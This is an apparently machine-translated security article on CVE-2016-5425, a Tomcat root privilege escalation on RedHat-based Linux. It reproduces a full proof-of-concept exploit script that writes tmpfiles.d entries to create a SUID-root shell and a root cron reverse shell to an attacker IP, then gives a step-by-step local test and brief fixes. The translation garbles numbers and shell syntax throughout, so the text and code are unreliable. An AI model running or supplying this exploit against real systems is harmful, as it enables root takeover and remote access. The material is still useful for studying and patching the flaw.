Description
Tomcat recently always want to engage in some big news, a month are not to, Tomcat and burst vulnerability. 2 0 1 6 1 0 On 1 1 December, online broke the Tomcat local to mention the right vulnerability, vulnerability number CVE-2 0 1 6-5 4 2 and 5. This affected mainly is based on the RedHat distribution version of Apache Tomcat, including CentOS, RedHat And OracleLinux, Fedora, and so on. The main reason is the General Tomcat user has permissions to the/usr/lib/tmpfiles. d/tomcat. conf this configuration file is read, then the user group members or with the normal Tomcat permissions WebShell permissions can be elevated to root level.
Vulnerability description
Based on the RedHat release version of Tomcat after installing tomcat, set the user to tomcat. conf file has write permissions, as follows
[root@localhost ~]# ls-al /usr/lib/tmpfiles. d/tomcat. conf-rw-rw-r–. 1 root tomcat 4 3 May 1 2 2 0 1 5 /usr/lib/tmpfiles. d/tomcat. conf
tmpfiles. d directory where the configuration file is systemd-tmpfiles used to manage the temporary file, an attacker could very easily inject the malicious payload into the tomcat. conf file, such as a new rally SHELL, the new one has the SUID permission of a file. When/usr/bin/systemd-tmpfiles when executed, the injected payload will get executed.
In REDHAT distributions, the default boot, systemd-tmpfiles will by systemd-tmpfiles-setup. Service service to be implemented, as follows:
[root@localhost www]# cat /usr/lib/systemd/system/systemd-tmpfiles-setup. service |grep ExecStartExecStart=/usr/bin/systemd-tmpfiles --create --remove --boot --exclude-prefix=/dev
Depends on the system used, systemd-tmpfiles may also be through other services, cronjobs,startup scripts, and other ways to trigger. Worthy of note in another place is that systemd-tmpfiles will not because the configuration file syntax errors cause an error stop. Therefore an attacker can easily inject malicious PAYLOAD to/usr/lib/tmpfiles. d/tomcat. conf
According to the following POC, we can see that·is injected into tomcat. conf meaning is to bounce the SHELL, and the new one has the SUID permissions of the shell,in particular C, z,F meaning, The we can man 5 tmpfiles. d to view.
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bashz /usr/share/tomcat/rootsh 4 7 7 0 root root-F /etc/cron. d/tomcatexploit 0 6 4 4 root root -"* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1
POC
-----------[ tomcat-RH-root.sh ]---------

#!/ bin/bash

Apache Tomcat packaging on RedHat-based distros - Root Privilege Escalation PoC Exploit

CVE-2 0 1 6-5 4 2 5

Full advisory at:

http://legalhackers.com/advisories/Tomcat-RedHat-Pkgs-Root-PrivEsc-Exploit-CVE-2016-5425.html

Discovered and coded by:

Dawid Golunski

http://legalhackers.com

Tested on RedHat, CentOS, OracleLinux, Fedora systems.

For testing purposes only.

ATTACKER_IP=127.0.0.1
ATTACKER_PORT=9 0 9 0

echo-e “\n* Apache Tomcat (RedHat distros) - Root PrivEsc PoC CVE-2 0 1 6-5 4 2 5 *”
echo-e “Discovered by Dawid Golunski\n”
echo “[+] Checking vulnerability”
ls-l /usr/lib/tmpfiles. d/tomcat. conf | grep ‘tomcat’
if [ $? -ne 0 ]; then
echo “Not vulnerable or the tomcat installed under a different user than ‘tomcat’”
exit 1
fi
echo-e “\n[+] Your system is vulnerable!”

echo-e “\n[+] Appending data to the /usr/lib/tmpfiles. d/tomcat. conf…”
cat>/usr/lib/tmpfiles. d/tomcat. conf
C /usr/share/tomcat/rootsh 4 7 7 0 root root - /bin/bash
z /usr/share/tomcat/rootsh 4 7 7 0 root root -
F /etc/cron. d/tomcatexploit 0 6 4 4 root root -“* * * * * root nohup bash-i >/dev/tcp/$ATTACKER_IP/$ATTACKER_PORT 0&1 & \n\n”
eof

echo “[+] /usr/lib/tmpfiles. d/tomcat. conf contains:”
cat /usr/lib/tmpfiles. d/tomcat. conf
echo-e “\n[+] Payload injected! Wait for your root shell…\n”
echo-e “Once ‘/usr/bin/systemd-tmpfiles --create’ gets executed (on reboot by tmpfiles-setup. service, by cron, by another service etc.),
the rootshell will be created in /usr/share/tomcat/rootsh.
Additionally, a reverse shell should get executed by crond shortly after and connect to $ATTACKER_IP:$ATTACKER_PORT \n”
--------------[ eof]--------------------
Local test:

1. First determine the next local LINUX release version and TOMCAT version.
   ! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 1 2 1 5 3 0 4 3 5 4 2. png? www. myhack58. com)
2. Switch to the tomcat group permissions, additional malicious payload to/usr/lib/tmpfiles. d/tomcat. conf file
   ! [](/Article/UploadPic/2016-10/2 0 1 6 1 0 1 2 1 5 3 0 4 4 9 2 6. png? www. myhack58. com)
   cat>/usr/lib/tmpfiles. d/tomcat. confF /etc/cron. d/tomcatexploit 0 6 4 4 root root -"* * * * * root nohup bash-i >/dev/tcp/192.168.1.3/9 9 9 9 0&1 & \n\n"eof
3. root permissions manually trigger/usr/bin/systemd-tmpfiles –create [this step is relatively tasteless, dependent on the system to have other services, cronjobs,start the script to trigger, if the system has, the better, if not, this vulnerability is relative used to say, you need to trigger systemd-tmpfiles, a bit tasteless]
   [root@localhost Desktop]# /usr/bin/systemd-tmpfiles --create
4. Get the bounce ROOT access SHELL
   Vulnerability
   The attacker may have a tomcat permissions, by rewriting the configuration file to achieve local mention of the right to ROOT access. If a remote attacker conjunction with a specific WEB application vulnerabilities, but also can achieve remote use.
   Affected version
   CentOS
   Fedora
   Oracle Linux
   RedHat
   Redhat official website details:https://access. redhat. com/security/cve/CVE-2 0 1 6-5 4 2 5
   Solutions
   Temporary repair recommendations
   You can adjust the/usr/lib/tmpfiles. d/tomcat. conf permissions, remove tomcat the Group’s write permissions.
   chmod 6 4 4 /usr/lib/tmpfiles. d/tomcat. conf
   Updated with the latest Tomcat package
   The Redhat security team has been in the first time to repair the affected Tomcat upstream package,to directly update the release version provided by Tomcat.